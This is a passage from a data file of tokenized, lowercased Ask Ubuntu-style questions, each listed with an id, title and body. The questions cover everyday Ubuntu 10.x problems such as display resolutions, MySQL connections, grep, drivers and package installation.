1084 1118 -hsync +vsync $ sudo xrandr -- newmode `` 1920x1080_60.00 '' 172.80 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync $ sudo xrandr -- addmode default 1920x1080_60.00 $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1680 x 1050 , maximum 1920 x 1200 default connected 1680x1050+0+0 0mm x 0mm 1920x1200 0.0 1600x1200 0.0 1680x1050 0.0* 1400x1050 0.0 1280x1024 0.0 1440x900 0.0 1280x960 0.0 1280x800 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 1920x1080_60.00 60.0 i also tried gtf 1920 1080 60 -x . in both cases i ca n't switch to that resolution and get : could not set configuration for crtc 262 all the other resolutions work .
12579	where is kile 's dictionary ?	i 've accidentally added 'itterative ' to kile 's dictionary ( right click on the wrong button ) . now i 'd like to remove 'itterative ' from the list of correct words but i ca n't locate the dictionary anymore ( the old link in settings- > configure kile ) does not link to where it used to ... thanks in advance , ps : i use kile as out of the box ... no special settings no-nothing edit to adress oli 's answer below . kcontrol is not in the 10.10 reps ( apparently ) downloading the .tar.gz version of kcontrol and install it , by typping : cd ~/documents/khepera subdirs= '' libtns_util libxfgc libkhepera kcontrol '' for i in $ subdirs ; do make -c $ i install ; done for i in $ subdirs ; do make -c $ i clean ; done for i in $ subdirs ; do make -c $ i tgz ; done creates load-full of errors . i guess they could be solved , but it seems of an overkill just to locate kile 's dictionary . any other ideas ?
12581	how can i proxy game traffic ( udp and tcp ) through a remote ubuntu server ?	i want to run a game client on my windows machine , but route the traffic through an ubuntu server located in another country . i know this will likely hurt latency , but that 's not the main concern here . what software should i install and how should i configure it on the remote ubuntu server to make this possible ?
12584	why does n't chromium have `` chrome pdf viewer '' plugin ?	the chrome build from google has a chrome pdf viewer plugin which is really nice . but , the chromium builds do n't seem to have it ( nothing shows up in about : plugins ) . how do i get the plugin in chromium on ubuntu ?
12586	how can i hide extra volume controls ?	currently i have sound controls in both the indicator applet and the notification area applet . does anyone know how i to hide the audio controls in the notification area ?
12589	ubuntu vulnerable to malware sites ?	i just browsed a site a while ago that was flagged as an `` attack site '' or has malware , but firefox did n't warn before i went into it . only when i opened a new tab with another page from the site did it block the page . how do i check for vulnerabilities on my system since i think there are no anti-malware available for ubuntu ? if there are , please do tell . thanks !
12597	looking for a pci wireless card for a ubuntu-based access point . any recommendations ?	i have recently been trying to setup a wireless access point on a small ubuntu server , but the wifi card does n't seem to be compatible . its a dlink dwa-552 , which i was hoping would work , but the chipset does n't seem to support what i 'm trying to do . is there another wireless card that 's currently available that would work ? this particular server only has a single pci slot available , so that may be a limitation . i 'd also prefer a card that supports 802.11 n ( non-draft ) , but the important thing is that it works . if it works , i 'd be happy with 802.11 n-draft or even 802.11 g. does anyone have any recommendations ?
12600	`` requires to install untrusted updates '' error in update manager	i selected security updates and other updates in update manager and i clicked 'install updates ' . it showed up an error like so 'requires to install untrusted updates ' and i clicked 'close ' , and it was the only button visible . the update manager started to build the list of updates again and it showed up 'install updates ' button once again . same thing happened again and again and i was not able to install any updates .
12601	how can i fix my epson stylus tx101 multifunction printer to print , scan , and copy ?	i have multifunction printer ( epson stylus tx101 ) , i can print but ca n't scan ... . any solution for my problem ? ( i already try using wine and install scan program from epson cd - not work , using simple scan and xsane - not detected . )
12602	how can i expand all folders while in the list view ?	i have a music folder that contains about 15 other folders , each only a single level deep . is there any way , via keyboard or other , to open the music folder in list view and expand all of the contained folders as well ? i know about using * to open a nested folder , but that only opens the immediate children of of the selected folder . here 's the directory structure : music billy joel storm front shameless she 's got a way glass houses for the longest time coldplay parachutes yellow x & y fix you what i want to be able to do is open nautilus to the music folder , then click or type something to expand all the folders to display their contents as above . right now , when i go into music , all i see is : music billy joel coldplay
12607	how can i make compiz and metacity co-exist happily ? i only have one or the other	while experimenting with sending virtual keystrokes , things got seriously hung up ! i powered off , when the system restarted all window decoration was missing , and all fancy compiz graphics was missing . i ran metacity -- replace . that brought back the window decoration , but still no compiz . i ran compiz -- replace , that brought back compiz functionality , but this time , no window decoration . how can i get compiz and metacity back together again ?
12611	application for slicing video	i 'm using pitivi to edit a long lecture , and i 'd like to split it into manageable chunks , then rearrange the pieces . however , i do n't see a good way to do that in pitivi ; apparently , i would have to cut a clip out , discard everything else , and save the clip for each clip i want to extract . is there an ubuntu application that 's designed to slice videos into clips , or an application that can do it well ?
12619	how do i install the glasgow haskell compiler ?	how can i install ghc in ubuntu 10.10 ?
12621	ca n't run a shell script	so i have this script : # ! /bin/bash # flips the screen ( hopefully ) syntax_error=0 orientation=0 current_orientation= '' $ ( xrandr -q -- verbose | grep 'connected ' | egrep -o '\ ) ( normal|left|inverted|right ) \ ( ' | egrep -o ' ( normal|left|inverted|right ) ' ) '' case $ current_orientation in normal ) current_orientation=0 ; ; left ) current_orientation=1 ; ; inverted ) current_orientation=2 ; ; right ) current_orientation=3 ; ; esac if [ $ current_orientation -eq 0 ] ; then orientation=2 fi if [ $ current_orientation -eq 2 ] ; then orientation=0 fi method=evdev # lenovo s10-3t change == > hard coded my device number to 11 ! ! ! ! ! ! ! ! device=11 swap=0 invert_x=0 invert_y=0 real_topx=0 real_topy=0 real_bottomx=4020 real_bottomy=4020 case $ orientation in 0 ) swap=0 invert_x=0 invert_y=0 topx= $ real_topx topy= $ real_topy bottomx= $ real_bottomx bottomy= $ real_bottomy ; ; 1 ) swap=1 invert_x=1 invert_y=0 topx= $ real_topx topy= $ real_topy bottomx= $ real_bottomy bottomy= $ real_bottomx ; ; 2 ) swap=0 invert_x=1 invert_y=1 topx= $ real_topx topy= $ real_topy bottomx= $ real_bottomx bottomy= $ real_bottomy ; ; 3 ) swap=1 invert_x=0 invert_y=1 topx= $ real_topx topy= $ real_topy bottomx= $ real_bottomy bottomy= $ real_bottomx ; ; esac if [ $ method = `` evdev '' ] ; then xinput set-prop `` $ device '' `` evdev axes swap '' $ swap xinput set-prop `` $ device '' `` evdev axes swap '' $ swap xinput set-prop `` $ device '' `` evdev axis inversion '' $ invert_x $ invert_y xinput set-prop `` $ device '' `` evdev axis calibration '' $ topx $ bottomx $ topy $ bottomy if [ $ orientation = 2 ] ; then xrandr -o inverted fi if [ $ orientation = 0 ] ; then xrandr -o normal fi fi # it 's for flipping screen in my lenovo s10-3t . i copied it from the netbook 's wiki page , and added the # ! /bin/bash at the top . the filename is flipscreen.sh . how can i make it work ?
12623	remote desktop advice	coming from windows , so that is what my expectations are based on . i have a ubuntu desktop edition instance running as a virtual machine on a server . i would like to use it as my primary open source dev environment but the vnc tools i have used do n't seem to be as rich as `` remote desktop connection '' in windows . the two things that are missing for me : connecting/logging into a non-console user sessions dynamically resizing the graphical resolution based on the size of the remote desktop window device sharing ( usb devices plugged into client shared with remote ) is there an appropriate client that i can run on windows to connect to my ubuntu dev instance that provides these capabilities ?
12630	mount point inside encrypted partition does n't mount	this seems a very simple problem but it 's driving me nuts . i 'm trying to mount two ext4 partitions at boot time with /etc/fstab . ( they are written differently because i read in a forum that there were some problems mounting by uuid ) here are the two lines : uuid=c7fa17c3-e1e0-489e-93ec-341928069664 /home/alice/virtualgarden ext4 rw , suid , dev , exec , auto , user , async 0 2 /dev/sda8 /home/alice/saco ext4 rw , suid , dev , exec , auto , user , async 0 3 the main problem is that after boot i wo n't have access to either partition . they appear in my desktop , but when i try to list their content they are empty . everything works if i mount them as a normal user after boot . for example : mount /home/alice/saco i do n't know if this makes a difference , but the mount point ( /home/alice/ ) is an encrypted partition . i tried to move the mount point to /saco and it mounted perfectly after reboot . another thing is that if i use the uuid in fstab nautilus creates two links for the same partition . i did some research and i have solved this by using /dev/disk/by-uuid/ . any tips or advise are welcome .
12632	edubuntu deployment and active directory authentication	how i can deploy edubuntu from one machine to many machines in the same domain and authenticate to windows active directory ?
12633	usb drive does n't unmount	when i unmount usb in nautilus elementary ( using unmount button ) sidebar it restarts rather than unmounting !
12634	changing brightness in samsung n140 plus	how to change screen/backlight brightness on samsung n140 plus ? i tried xbacklight , but is says it ca n't see a backlighted out . the install is out-of-box ubuntu 10.10 desktop . so how do i change the brightness ?
12641	can i use kvm on a `` real '' windows install ?	i need to get a password from my chrome install on my windows 7 partition . the windows version of chrome , however , uses windows ' own crypto api to protect this data ( i doubt wine has a compatible implementation ) . this means i 'd have to reboot , get in , get the password and get out , wasting ten minutes in the process . it 'd be faster if i could just virtualize what 's on my windows partition ! sudo kvm /dev/sda is this a good idea ? would this work ? would this work well ?
12646	is ubuntu 10.04 compatible with toshiba l640d	will ubuntu 10.04/10.10 work on a toshiba l640d ? i mean , i am going to install it on sunday , but just wanted to know before hand if i will encounter any problems ( read ati ) . i looked up the ubuntu certified devices , but i did not find the model listed . any users with the said configuration ? thanks .
12647	setting up a git server	i 've recently set up ubuntu-server on amazon ec2 . i would like to use it as my git server , so i could store my repos there . so , where can i find some detailed instructions of how to setup git on ubuntu server ? all these ssh keys and stuff like that , multiple users , etc .
12651	problem with fglrx when updating from 10.04 to 10.10	well i had some problems with update so i 'll post solution . i use dell studio 1555 . my symptoms were that after reboot screen flickered and then i got console login prompt . basically after the upgrade xorg wo n't start . i belive it was because updater installed stale fglrx package from /var/cache/apt/archives/ . ( so please before you upgrade do sudo apt-get clean )
12654	is there a way to have wall messages show to desktop users ?	let 's say i 'm away from home , ssh-ing on my home computer . for any reason , i need it rebooted . # shutdown -r +10 this sends a warning message every minute via wall , which is completely invisible for normal desktop use by , say , my parents . is there any way wall messages can reach the desktop via , say , notification .
12659	jvm is crashing randomly when trying to use eclipse	since i installed ubuntu 10.04 on my pc , i have eclipse crashing every hour or more without apparent action . in the logs , i see that the cause is related to java : # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007f95f32ce9c0 , pid=2382 , tid=140280562099984 # # jre version : 6.0_18-b18 # java vm : openjdk 64-bit server vm ( 16.0-b13 mixed mode linux-amd64 ) # derivative : icedtea6 1.8.2 # distribution : ubuntu 10.04.1 lts , package 6b18-1.8.2-4ubuntu2 # problematic frame : # v [ libjvm.so+0x5309c0 ] # # an error report file with more information is saved as : # /home/elapouya/perso/projects/django/rsame/hs_err_pid2382.log # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # www.eclipse.org knows this bug and it is recommended to use 1.6.0.10 or more , or go jdk 1.5 i installed the latest jvm official but still crashes . i 6.0_18-b18 ( i do not know if this is 1.6.0.10 ... ) so i installed an older version : 1.5.0_19 , but i still have random crashes : # # an unexpected error has been detected by hotspot virtual machine : # # sigsegv ( 0xb ) at pc=0x00007fc833c91dfe , pid=8630 , tid=140496587896592 # # java vm : java hotspot ( tm ) 64-bit server vm ( 1.5.0_19-b02 mixed mode ) # problematic frame : # v [ libjvm.so+0x5b1dfe ] # # an error report file with more information is saved as hs_err_pid8630.log # # if you would like to submit a bug report , please visit : # http : //java.sun.com/webapps/bugreport/crash.jsp # i did an apt-get upgrade to be up-to-date , but it continues to crash : what do you recommend ?
12661	how to make an usb port work as usb 2.0 after it had a keyboard attached to it at boot time ?	if i attach an usb keyboard ( i usually do it before turning the computer on ) , then detach the keyboard and attach an usb hdd , it takes very long for the hdd to be detected and mounted and after all it works only as usb 1.1 . is there a way to make it work as a correct usb 2.0 port again without rebooting ?
12674	apache server a attempts conn to mysql server b. times out	i have an apache web server running php . i am trying to make a connection from apache server to a database server running mysql server . heres a run down of the settings in place . apache server : rhel 5.5 ; php 5.3.2 database server : ubuntu 10.04 64bit ; mysql server version 5.1 there are no firewall rules restricting connections between these two machines . neither in our hardware firewall or in iptables . /etc/mysql/my.cnf has the bind-address set to the machine 's ip . skip-networking is commented out , ie disabled . mysql is running and on the standard port 3306 /var/run/mysqld/mysqld.sock is owned by mysql i can connect to mysql locally the following is my php connection script : < ? php $ host= '' 555.555.55.55 '' ; $ user= '' some_user '' ; $ pass= '' some_pass '' ; $ conn = mysql_connect ( $ host , $ user , $ pass ) ; if ( $ conn === false ) { echo mysql_error ( ) ; } else { echo 'connected ' ; mysql_close ( $ conn ) ; } ? > attempting to execute the php script in a browser hosted on the apache server only yields : `` could not connect : ca n't connect to mysql server on '555.555.55.55 ' ( 4 ) '' any suggestions ? thanks .
12682	why does `` metacity -- replace '' hang my system , but `` metacity -- replace & '' is fine ?	the following applies to lucid 10.04 it happens on my `` real '' computer and also in a virtualbox vm ... ( update ) i just now installed maverick 10.10 to a vm ... and almost the same thing happens ! i do have keyboard control ( initially ) but the only way i can exit the terminal is to close it with the process still running ( or ctrl+c ) , and this causes the lockup ( pressing enter does n't take it back to the prompt ) $ metacity -- replace the above command ( in the terminal ) causes my system to hang , every time . the command does not return to the prompt . the window decoration disappears ( maybe because the command has n't completed ? ) . the keyboard becomes non-functional , ( but the mouse still works ) ... however , the following commands work fine , every time . $ ( metacity -- replace & ) $ metacity -- replace & # this works too it may `` hang '' only in that i loose the keyboard , and so ca n't press enter to bring it back to the prompt , ( ... as i have noticed is the case with some unrelated commands which do n't `` fully '' return to the prompt , until i press enter ) what 's going on here ? my `` host '' os is not new , but the vm is in mint condition ( almost ) ... and they both exhibit this keyboard `` lock-up '' .
12683	how to use touch-gesture-recognition-stack on multitouch-enabled touchpads ?	i currently have a synaptics touchpad with only few classic multitouch features ( 2 finger scroll , right click ) . by installing the respective testing suite , i saw that it does n't accept my touchpad as input device . i want to buy a newer notebook and would like to benefit of touch-related features ( window management , swipe , pinch , rotate ) . does the touch-framework only work on touchscreens or also on touchpads ? what requirements should i take into account when choosing a new notebook ?
12689	how to force gnome panels et . al . to display on a different monitor without mirroring ?	so , i recently purchased a new 23 '' monitor for my pc . however , i ca n't use it with the pc currently as i am waiting on a replacement heatsink . in the mean time , i wanted to use it with my dell laptop . i hooked it up to the vga port , and it seems to be working properly . however , i wanted to know if there was a way i could move all of the main display elements over to the attached monitor ? i wanted to shut the lcd panel off on the laptop and hook it up like a desktop . relevant specs : ubuntu 10.10 x64 intel graphics chipset the attached monitor is currently set as the default monitor . any suggestions are welcome . : )
12690	how can i use a .html file as desktop background/wallpaper ?	i have one of those underpowered netbooks with lubuntu . i also have an ipod touch . i 'd like the best of both worlds . so i would like to create an active html wallpaper with beautiful little squared icons to launch my webapps through chromium/firefox . i 've read a bit , but it looks like there is n't really anything that would allow for that . does anyone have any other alternatives ( apart from buying an ipad ) ? : )
12697	how to set a upstart job to start manually ?	i want to disable a bunch of upstart jobs here . i know how to make a upstart job . and also i know how to stop manually a job . however , i ca n't find a sample where i turn a automatically job into a manually job . that is , i want the job to be started only when the user activate , for instance running this command ( as root ) : service job-name start
12699	how can i revert a config file back to the originally installed version after i have edited it ?	i want to revert a file in /etc/ back to its originally-installed form . i have edited the file since it was installed . how can i revert this config file ? apt is smart enough not to overwrite edited config files , so how do i tell it that i want it to do so ? for argument 's sake , let 's say that i want to rever the file /etc/foo.conf from the package foo .
12703	installing and setting up mysql ?	i have been trying to install mysql on ubuntu 10.10 and just ca n't get it to work . i installed it by running sudo apt-get install mysql-server and once that was done , when i try mysql i get the message : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i tried mysql start and get the same thing . i am sure i am doing something wrong , any pointers would be great .
12709	how to setup gnome & kde to use the same soundsystem ?	using maverick ubuntu with added kubuntu-desktop : i look at kde systemsettings in the multimedia section . under phonon backend it says i use xine . no option to add or change anything here . now gnome uses gstreamer and pulseaudio ... i 'm using a lot kde applications in gnome and a lot of gnome applications with kde . i use wine applications also . therefore it seems reasonable to reduce the soundsystem to one framework . ( ? ) should i use xine or gstreamer ? i read kubuntu uses pulseaudio as well , but i ca n't find it in there , though i really like pulseaudio for the ability to manually tell the system toplay this apllication 's sound on headphone , the other one on internal soundchip and so forth ... what to do to have a running pulseaudio system for all occasions and what 's the best way to play the sound of the applications with either xine or gstreamer ?
12710	how do i install jboss ?	i 'm looking for a how-to for installing jboss on ubuntu 10.10 .
12716	change the complete kde desktop look like a theme ?	is there any application to change the complete look of kde like a theme in gnome ? without changing the colors , icons , styles , backgrounds , decorators and so forth individually but in one process instead ? something like a theme manager ? i would like to create a complete kde desktop look & style and then share it with friends without setting up 8 sets of settings with all kinds of importing files and setups .
12717	how can i set portable icons in nautilus ?	let 's assume that i have a portable storage device that i use on multiple machines ( running gnome and otherwise , but let 's focus on gnome + nautilus ) . is there any way to set an icon for a folder in such a way that the icon will be stored ( hidden ) within the folder and displayed automatically on multiple machines ? i found this brainstorm idea but thought it may be too specific in its use of folder.jpg . i 'm just interested in a way to do this , regardless of what the file is named . to clarify , i 'm focused on the use of icons , not thumbnails . i 'm starting to believe that there is no way to do this without regularly running a script to set icons based on , say , an icon stored within each folder .
12718	asus k52f laptop web camera shows upside-down picture in skype	how to fix upside-down picture produced by web camera in asus k52f ( 1.3 mpix , do n't know the model ) laptop ( intel i3 m350 , intel video , ubuntu 10.10 ) ? update : it seems ridiculous : ) but the `` upside-down issue '' is continuing even in ubuntu 11.10 . i am pretty sure it 's a skype prob ( 2.2.0.35 beta from official ubuntu partner repository . )
12720	is there any software that really disables laptop 's touchpad ?	my laptop pc is a hp g5055ea and i tried some scripts and applications to disable its touchpad , but no one works permanently : some of this software disables touchpad only for a few minutes and others does nothing at all !
12734	which tool to use for `` home banking '' ?	i would like to manage my bank accounts in a secure manner on ubuntu . i saw several applications in the software centre , but i do n't know which one to choose . i do n't need fancy features like stock options . i just have regular accounts which i want to follow , i do n't want complicated stuff . as bank data are quite sensitive , i would highly prefer an application that does encryption of the data . though , if you have a really cool app but it does not have this feature , as long as it offers to store the data in one dedicated place , i could do with encrypting that place . so what tool do you use that could fit my needs ?
12735	how can i set my laptop to remember my multiple display configuration ?	i have a notebook display and vga connected display to expand my desktopview . virtual desktops on linux are very well and easy to switch , but i need at least two displays . i already tested randr but there are some problems when i take my notebook elswere . the settings are not stored and i need to set up every time new . am i doing something wrong ? this is little bit easier in windows . is there some application for ubuntu too ?
12743	how does unity decide the icon background colours ?	the icons on the unity launcher are square and contain the icon image and have a coloured background . the icons have different colours as their backgrounds ( see screenshot ) . how does unity decide what colour this should be ?
12744	ubuntu server 10.04 esxi 4 vmtools install ?	am struggling to install vmtools on a ubuntu 10.04 server guest on my esxi server . i have tried the `` install vm tools '' option but that does nothing . i have tried running the apt-get install vmware-tools but get the message that there are no packages . has anyone managed to do this as it is driving me nuts ?
12745	how to merge 2 gnome password keyrings ?	i 've ended up with two password keyrings - one from old laptop and one from current installation . how do i merge the two password keyrings into one so that i do n't have to unlock both of them at login ?
12748	how can i limit cd drive speed while on the live cd to avoid drive noise ?	i sometimes disconect my harddisks for the weeks while only using the internet and i use the ubuntu live cd . but every time it needs something while in live desktop it accelerates and makes a lot of noise , also the acceleration takes too long . i want lower drive speed than acceleration lags , because acceleration lags stop me completly exactly when i need something . how can i lower the cd drive speed , say to maximum 16x , without restarting ? i ca n't restart because i only use the cd drive , no harddisks , no flash disks , no network disks . edit : no usb drives . setcd does not work for the live session .
12750	which contact sheet generator can be scripted ?	a contact sheet is a image containing the name and a the small version of a group of images , like this : which is the best program to do it from the command line ? ( preferably something that is already package with ubuntu . )
12751	what repositories are you using for 10.10 software ?	here is hoping that this is not duplicated somewhere else ... back before the easy addition of launchpad ppas , many of us used to customize our sources list to include user/3rd party repositories . some ambitious ubuntu'ers would even maintain updated lists on their websites . it was the easiest way to install software for things like google earth in the earlier days . so the question i am asking may prove useful for the newcomers and for the experienced . what other repositories ( like medibuntu ) have you found useful for 10.10 ( other than ppas ) ?
12758	different cursor in skype	i have changed my default cursor theme to the dmz black , but when my mouse hovers over any skype window , it turns into dmz white ( only while hovering ) . when i try to take a screenshot of it , the cursor shows up as black on the image , which is rather weird . anybody who 's got an idea how to fix it ?
12759	will i be able to set a 2560x1440 resolution on a 27 '' screen ?	i just picked up one of those fancy dell u2711 27 '' screens that has a maximum resolution of 2560x1440 . while i await delivery , i need to upgrade my graphics card to drive this baby as my current one wo n't do the trick . i am considering an evga with an nvidia gts450 chip and dual dvi-i ports . it can go up to 2560x1600 in dvi-d mode with the corresponding dual link cable . should i expect any driver issues with this setup and the nvidia binary drivers ? i have googled quite a bit and most people i found claiming problems with these resolutions are using notebooks ( so either vga or hdmi , that i do n't think should work ) . edit : is it possible alhough all the components are good up to 2560x1600 , that they wo n't allow me to set 2560x1440 ? i 've had this happen with some widescreen lcds in the past where a video card would go up to a higher resolution , but the exact mode needed was not an option ( resolutions such 1152x ... come to mind ) . conclusion : indeed , everything worked out of the box with the nvidia binary drivers in meerkat . just for future reference , i ended up using a gtx460 card with a dual-link dvi-d cable . thanks !
12760	how to disable hibernating ?	whereas many questions are geared towards implementing hibernation , mine is how to disable it . i 've just encrypted my swap partition , and i such my system can still hibernate , but can not resume anymore . so , to avoid mistakes i would to disable hibernating system-wide . note : i still want suspend !
12764	where do i get a package for gnu parallel ?	i want to install gnu parallel in ubuntu but i ca n't find a package for it in the default ubuntu repos . where can i get it ?
12766	adjust volume via commandline so that volume notify pops up	is there a way to adjust the system volume via commandline so that the default volume popup ( the one that pops up when pressing the media keys on notebooks ) is still shown . i need this for my remote control . it 'll be run using a lircrc file and irexec .
12774	recommended console ftp clients	are there any full featured console ( command line ) ftp clients ? i 'm moving parts of a website from one host to another . one server has ssh shell access ( and thus scp , sftp , etc . ) , the other only ftp . my home computer is an ubuntu desktop . what i have been doing till now is using filezilla to download to my desktop , and then uploading to the new server from there . this is slow and inefficient , everything is transferred twice and my home network speed is limited , and has a monthly bandwidth quota besides . the two servers have a fast connection between them though . i 'd rather just ssh into one server and retrieve the files i need directly . so what i 'm looking for a console ftp client which has feature set similar to filezilla ( i need to pick and choose what to transfer and what to leave behind ) . does such a creature exist ?
12780	how to find out what graphics card is present in your system ?	is it possible to find the exact configuration and model of your systems graphics card in ubuntu 10.10 ?
12782	excluding results from grep	so i have a project under svn and i 'm searching the file contents . in the result set i get .svn files that i do n't want actually to see . for example : $ grep -i -r `` breadcrumb '' . -l ./terms_and_conditions/.svn/text-base/index.tpl.svn-base ./terms_and_conditions/.svn/tmp/index.tpl.tmp ./terms_and_conditions/.svn/tmp/index.tpl.3.tmp ./terms_and_conditions/.svn/tmp/index.tpl.2.tmp ./terms_and_conditions/index.tpl ./privacy/.svn/text-base/index.tpl.svn-base ./privacy/.svn/tmp/index.tpl.tmp ./privacy/.svn/tmp/index.tpl.3.tmp ./privacy/.svn/tmp/index.tpl.2.tmp ./privacy/index.tpl how can i exclude the files under `` .svn '' directories from the result set so that i only get ./terms_and_conditions/index.tpl ./privacy/index.tpl
12792	fan control on acer aspire one d255 netbook	i have ubuntu netbook edition on my acer aspire one d255 netbook and i notice that i always hear the fan working at 100 % despite the actual temperature . i run the sensors command its only at 13c , theres no reason why the fan needs to be running this hard at that temp . root @ adam-netbook : ~ # sensors acpitz-virtual-0 adapter : virtual device temp1 : +13.0째c ( crit = +100.0째c ) i 'm guessing i may need some drivers in order to interact with the fan ? does anyone have any experience with this ? it also seems that `` sensors '' may not be all that accurate , the temperature never seems to fluctuate .
12809	how to set up via chrome9 screen driver ?	i have an old machine here with a via chipset . the default screen resolution is 800x600 but the monitor is a widescreen lcd monitor which is capable of much more . i 've tried to install the ubuntu 10.04 via drivers found on their linux drivers page and i followed the instructions . the ./vinstall completed without a problem and i rebooted . on reboot xorg did n't start and the log files say the the driver .so file is missing , can not be found and therefore there are no screens . has anybody managed to get this configuration working ? my requirements are really only for a basic desktop on the monitor 's default resolution .
12812	how do i get gmail to start on my second desktop window ?	i 've got the compiz place windows plugin working for most of my apps , but i ca n't get gmail to open on a specified desktop window/viewport . under compizconfig settings manager > > place windows > > fixed window placement > > windows with fixed viewport , i have class=pidgin , x=2 , y=1 , and that works fine , but i ca n't get gmail to place properly . i 've tried class=prism , title=gmail , title=gmail ... the gmail prism config is from the prism-google-mail 1.0b3+svn20100210r62050-0ubuntu2 package . any ideas ?
12815	jack sound server how to ?	how to setup jack sound server for any music program ?
12816	running gnome , different cursor in kate	i have my cursor set to a big , high-contrast size . i 'm running gnome , and when i mouse over my kate window , the cursor changes into a very small , difficult to see size . any chance this is fix-able ... ?
12818	can i upgrade my ubuntu 10.04 to 10.10 using livecd ?	can i upgrade my ubuntu with a livecd ( i do n't have a stable internet connection ) ? if i have to use the command line please provide a step-by-step solution as i 'm a beginner . and i heard , many problem after upgrade to ubuntu 10.10 ? is it true ?
12819	what is an affordable monitor compatible with hdmi and ubuntu ?	my main computer is a laptop and i would like to buy an external , bigger monitor for it . i already tried one , but it only had a normal vga connection . unfortunately the screen flickered a lot , and i suspect that this was because my notebook 's vga port does not deliver enough power . that is the reason why i want to buy a monitor which i can use with my hdmi port . is this properly supported with ubuntu ? can i buy any screen i like that has an hdmi plug ? or do you have to avoid certain products ?
12821	which netbooks are `` safe to buy '' ?	to have a lightweight computer i would like to buy a netbook . are there any netbooks especially suiting ubuntu ? for example , i have read that unity causes problems on some machines , which i would like to avoid .
12823	how to define a shortcut key to grab part of the screen ?	i 've been trying to create a short-cut key for grabbing part of the screen . if i run the command /usr/bin/gnome-screenshot -- area the program i want runs and does what i want . when i createa a custom action in the keyboard shortcuts menu , and i activate the command ( using ctrl-prnscr ) the command fires up but behaves as though the -- area option is n't there ( it grabs the whole screen instead of giving me a cursor to choose with ) . if i run ps -eaf |grep screen i get : $ ps -eaf |grep screen yfarjoun 2082 1 0 oct29 ? 00:00:21 gnome-screensaver yfarjoun 17730 1 0 17:34 ? 00:00:00 gnome-screenshot -- area yfarjoun 17735 17730 1 17:34 ? 00:00:00 gnome-screenshot -- area yfarjoun 17741 2599 0 17:34 pts/0 00:00:00 grep -- color=auto screen so the option is definitely transfered to the command ... . why is it not honoring the option ? how can i fix this ?
12833	live cam voice creative	i have a live cam voice of creative , but i can not play because i do n't know how to install driver . can you help me ?
12835	nautilus and the visualization of available volumes/partitions	today i was wondering something about nautilus : what service/module does use nautilus sidebar to list mounted and unmounted partitions/volumes ? i realize it 's not strictly about ubuntu , but ubuntu does a peculiar use of nautilus so i was curious about that .
12836	does the tv tuner terratec t1 work well ?	i 'm planning to buy terratec t1 tv tuner and i 'd like to know if it works on ubuntu `` out-of-the-box '' meaning that there is no need to recompile kernel or doing advanced installatons . has any1 tested it ?
12840	how to remove *-pae grub2 entries from previous install ?	i recently upgraded ubuntu 10.10 from 32 to 64bit , but there are two entries i 'd like to remove - they 're the 32bit entries , with -pae suffix . there is even a initrd- ... -pae image for them in /boot . do you know how to clean this mess ?
12842	how do i install parallels tools via the command line ?	i have ubuntu server 10.10 running on parallels 6 ( latest update from yesterday ) on my imac . i click on the install parallels tools in the parallels desktop menu , but do not see where what i think should be the file prl-tools-lin.iso is placed . do n't understand whether the warning that i may have to do mount -o exec applies to me or not . think i might be able to mount and run the .iso file , if i can locate it . any ideas ?
12843	my system screen goes black and displays term signal killed ?	my computer will often just die randomly while i am using it . the screen goes black and sometimes displays the words term signal killed along with other things and sometimes it displays nothing . the writing stays on the screen momentarily before it disappears to just black . i then have to hold in the power button to turn it off and then re boot . here are the specs ... help ! ubuntu 10.04 ( lucid ) kernel linux 2.6.32-23-generic gnome 2.30.2 memory 495.7 mib processor intel ( r ) pentium ( r ) 4cpu 1.80ghz
12845	clicking a window 's decoration brings the window to the top , but clicking elswhere does not !	to bring a window to the `` top '' via the mouse ( ie . to bring it above other overlapping windows ) , i need to click on the window decoration . clicking anywhere else in the window , activates the window , but does not bring it to the top . overlapping windows remain overlapped ( obscuring the window i 've just clicked on ... until i click on the window decoration ) . this mouse-click issue occurs with a maximized window too . keyboard actions like < alt > +tab work fine ; the window comes fully into view . this behaviour is the same for : * compiz window manager ( with the gtk window decorator ) * compiz window manager ( with the emerald window decorator ) * metacity window manager is there some magic button to press to bring things back to normal ?
12846	poor performance of vnc client with compiz enabled on remote machine	i am running a ubuntu 10.10 machine which is controlled remotely via the vinagre client installed on another machine running the same os . the problem is that there is a significant delay in pointer movements when the remote machine has compiz enabled . however using metacity things are very smooth . is it a problem with compiz , vinagre or something else ?
12848	ubuntu one does n't start after login	on my desktop ( ubuntu 10.10 64 bit ) ubuntu one does n't start after login . i have to start the ubuntuone preferences , than i have to wait a while until the connect butten is enabled and than i can connect . how can i start it after login ?
12849	adding banshee to the sound indicator	how to put banshee into sound the indicator ?
12853	freezes when i close the lid	hi , everytime i close my laptop lid , my laptop does n't go into hibernate , suspand , blackscreen ... it just freezes , even when i open the lid , and the only thing left to do is restart my pc . i use a dualboot system , vista 64 and ubuntu 10.04 on a dell studio 15 . is there any way to fix this without messing up the vista partition ?
12856	how to install gcc-4.1 ?	1 ) i need gcc-4.1 for matlab mex usage , but i ca n't get it installed fully with apt-get install : the following packages have unmet dependencies : libstdc++6-4.1-dev : depends : gcc-4.1-base ( = 4.1.2-27ubuntu1 ) but 4.1.2-29ubuntu1 is to be installed depends : g++-4.1 ( = 4.1.2-27ubuntu1 ) but it is not going to be installed e : broken packages 2 ) i now only have gcc-4.1-base and -multilib installed . when compiling mex file : /usr/bin/ld : can not find -lstdc++ collect2 : ld returned 1 exit status something is wrong with libstdc++6-4.1-dev . so i went to http : //packages.ubuntu.com/maverick/gcc-4.1 and download libstdc++6-4.1-dev_4.1.2-27ubuntu1_i386.deb . but can not install it : dependency is not satisfiable : g++-4.1 ( = 4.1.2-21ubuntu1 ) thanks
